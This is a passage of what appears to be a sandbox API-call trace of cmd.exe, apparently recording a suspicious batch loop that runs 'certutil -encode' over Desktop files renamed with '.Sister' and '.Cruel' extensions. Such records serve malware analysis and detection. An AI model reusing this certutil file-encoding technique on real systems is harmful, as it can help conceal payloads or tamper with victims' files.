returned 0x21ed8c70000 [0269.241] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937c1f0 [0269.241] GetProcessHeap () returned 0x21ed8c70000 [0269.241] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d60a40 [0269.242] GetProcessHeap () returned 0x21ed8c70000 [0269.242] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60a40, Size=0x1be) returned 0x21ed8d60a40 [0269.242] GetProcessHeap () returned 0x21ed8c70000 [0269.242] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d60a40) returned 0x1be [0269.242] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0269.242] GetProcessHeap () returned 0x21ed8c70000 [0269.242] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed93b0b30 [0269.242] GetProcessHeap () returned 0x21ed8c70000 [0269.242] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0b30, Size=0x7e) returned 0x21ed93b0b30 [0269.242] GetProcessHeap () returned 0x21ed8c70000 [0269.242] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0b30) returned 0x7e [0269.242] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.242] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0269.243] GetLastError () returned 0x2 [0269.243] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.243] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0269.243] GetLastError () returned 0x2 [0269.243] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.243] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0269.244] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0269.244] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0269.244] GetLastError () returned 0x2 [0269.244] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0269.244] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0269.244] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0269.244] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0269.244] ??_V@YAXPEAX@Z () returned 0x1 [0269.244] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0269.313] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0269.313] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0269.313] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0269.314] GetProcessHeap () returned 0x21ed8c70000 [0269.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bc0 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0269.314] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0269.315] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0269.315] GetProcessHeap () returned 0x21ed8c70000 [0269.315] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bc0) returned 1 [0269.315] GetProcessHeap () returned 0x21ed8c70000 [0269.315] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95820 [0269.316] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0269.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0269.316] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0269.392] _get_osfhandle (_FileHandle=0) returned 0x4c [0269.392] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0269.430] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.png.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.png.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xd48, dwThreadId=0x348)) returned 1 [0269.442] CloseHandle (hObject=0xa8) returned 1 [0269.442] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0269.442] GetProcessHeap () returned 0x21ed8c70000 [0269.442] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0269.443] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0269.443] GetProcessHeap () returned 0x21ed8c70000 [0269.443] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d160 [0269.443] FreeEnvironmentStringsA (penv="=") returned 1 [0269.443] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0271.332] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0271.333] CloseHandle (hObject=0xa4) returned 1 [0271.333] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0271.333] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0271.333] GetProcessHeap () returned 0x21ed8c70000 [0271.333] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d160) returned 1 [0271.333] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0271.333] GetProcessHeap () returned 0x21ed8c70000 [0271.333] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d160 [0271.333] FreeEnvironmentStringsA (penv="=") returned 1 [0271.333] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0271.333] GetProcessHeap () returned 0x21ed8c70000 [0271.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d160) returned 1 [0271.334] GetEnvironmentStringsW () returned 0x21ed8d60c10* [0271.334] GetProcessHeap () returned 0x21ed8c70000 [0271.334] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937d160 [0271.334] FreeEnvironmentStringsA (penv="=") returned 1 [0271.334] GetProcessHeap () returned 0x21ed8c70000 [0271.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95820) returned 1 [0271.334] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0271.334] ??_V@YAXPEAX@Z () returned 0x1 [0271.334] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbff840b0, ftCreationTime.dwHighDateTime=0x1d5ef44, ftLastAccessTime.dwLowDateTime=0x7ae7f5f0, ftLastAccessTime.dwHighDateTime=0x1d5e0cc, ftLastWriteTime.dwLowDateTime=0x7ae7f5f0, ftLastWriteTime.dwHighDateTime=0x1d5e0cc, nFileSizeHigh=0x0, nFileSizeLow=0xcb3b, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="yLW8a6BSku30pNN.csv.Sister", cAlternateFileName="")) returned 1 [0271.334] GetProcessHeap () returned 0x21ed8c70000 [0271.334] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d603e0, Size=0x686) returned 0x21ed937dcb0 [0271.334] GetProcessHeap () returned 0x21ed8c70000 [0271.334] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937dcb0) returned 0x686 [0271.334] GetProcessHeap () returned 0x21ed8c70000 [0271.334] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29ec0 [0271.334] GetProcessHeap () returned 0x21ed8c70000 [0271.334] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29ec0, Size=0x58) returned 0x21ed8d29ec0 [0271.334] GetProcessHeap () returned 0x21ed8c70000 [0271.335] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29ec0) returned 0x58 [0271.335] GetProcessHeap () returned 0x21ed8c70000 [0271.335] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29f30 [0271.335] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0271.335] GetProcessHeap () returned 0x21ed8c70000 [0271.335] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x46) returned 0x21ed8cc7d80 [0271.335] ??_V@YAXPEAX@Z () returned 0x1 [0271.335] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0271.335] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0271.335] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0271.336] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0271.336] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0271.336] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcbf2c395, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xcbf2c395, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0271.336] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0271.336] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yLW8a6BSku30pNN.csv.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbff840b0, ftCreationTime.dwHighDateTime=0x1d5ef44, ftLastAccessTime.dwLowDateTime=0x7ae7f5f0, ftLastAccessTime.dwHighDateTime=0x1d5e0cc, ftLastWriteTime.dwLowDateTime=0x7ae7f5f0, ftLastWriteTime.dwHighDateTime=0x1d5e0cc, nFileSizeHigh=0x0, nFileSizeLow=0xcb3b, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="yLW8a6BSku30pNN.csv.Sister", cAlternateFileName="YLW8A6~1.SIS")) returned 0x21ed8c7cf40 [0271.336] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0271.337] _wcsnicmp (_String1="YLW8A6~1.SIS", _String2="yLW8a6BSku30pNN.csv.Sister", _MaxCount=0x1a) returned 28 [0271.337] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0271.337] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0271.337] GetProcessHeap () returned 0x21ed8c70000 [0271.337] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8c50 [0271.337] ??_V@YAXPEAX@Z () returned 0x1 [0271.337] ??_V@YAXPEAX@Z () returned 0x1 [0271.337] GetProcessHeap () returned 0x21ed8c70000 [0271.337] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29f30, Size=0x220) returned 0x21ed8d29f30 [0271.337] GetProcessHeap () returned 0x21ed8c70000 [0271.337] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29f30) returned 0x220 [0271.337] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0271.337] _get_osfhandle (_FileHandle=1) returned 0x50 [0271.337] GetFileType (hFile=0x50) returned 0x2 [0271.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0271.337] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0271.406] _get_osfhandle (_FileHandle=1) returned 0x50 [0271.406] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0271.482] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0271.482] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0271.482] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0271.482] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0271.482] _get_osfhandle (_FileHandle=1) returned 0x50 [0271.482] GetFileType (hFile=0x50) returned 0x2 [0271.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0271.482] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0271.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0271.658] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0271.768] _get_osfhandle (_FileHandle=1) returned 0x50 [0271.768] GetFileType (hFile=0x50) returned 0x2 [0271.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0271.768] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0271.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0271.836] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d29ed0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d29ed0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0271.944] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.csv.Cruel\" ") returned 66 [0271.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0271.944] GetFileType (hFile=0x50) returned 0x2 [0271.944] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0271.944] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0272.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0272.014] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x42, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x42) returned 1 [0272.097] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0272.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0272.097] GetFileType (hFile=0x50) returned 0x2 [0272.097] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0272.097] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0272.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0272.166] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0272.247] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0272.341] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0272.341] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0272.341] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0272.341] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0272.341] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0272.341] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0272.341] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0272.341] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0272.341] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0272.341] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0272.341] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0272.341] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0272.341] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0272.341] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0272.341] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0272.341] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0272.341] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0272.341] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0272.341] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0272.341] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0272.342] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0272.342] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0272.342] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0272.342] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0272.342] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0272.342] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0272.342] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0272.342] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0272.342] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0272.342] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0272.342] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0272.342] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0272.342] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0272.342] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0272.342] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0272.342] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0272.342] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0272.342] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0272.342] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0272.342] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0272.342] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0272.342] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0272.342] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0272.342] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0272.342] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0272.342] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0272.343] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0272.343] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0272.343] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0272.343] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0272.343] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0272.343] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0272.343] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0272.343] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0272.343] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0272.343] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 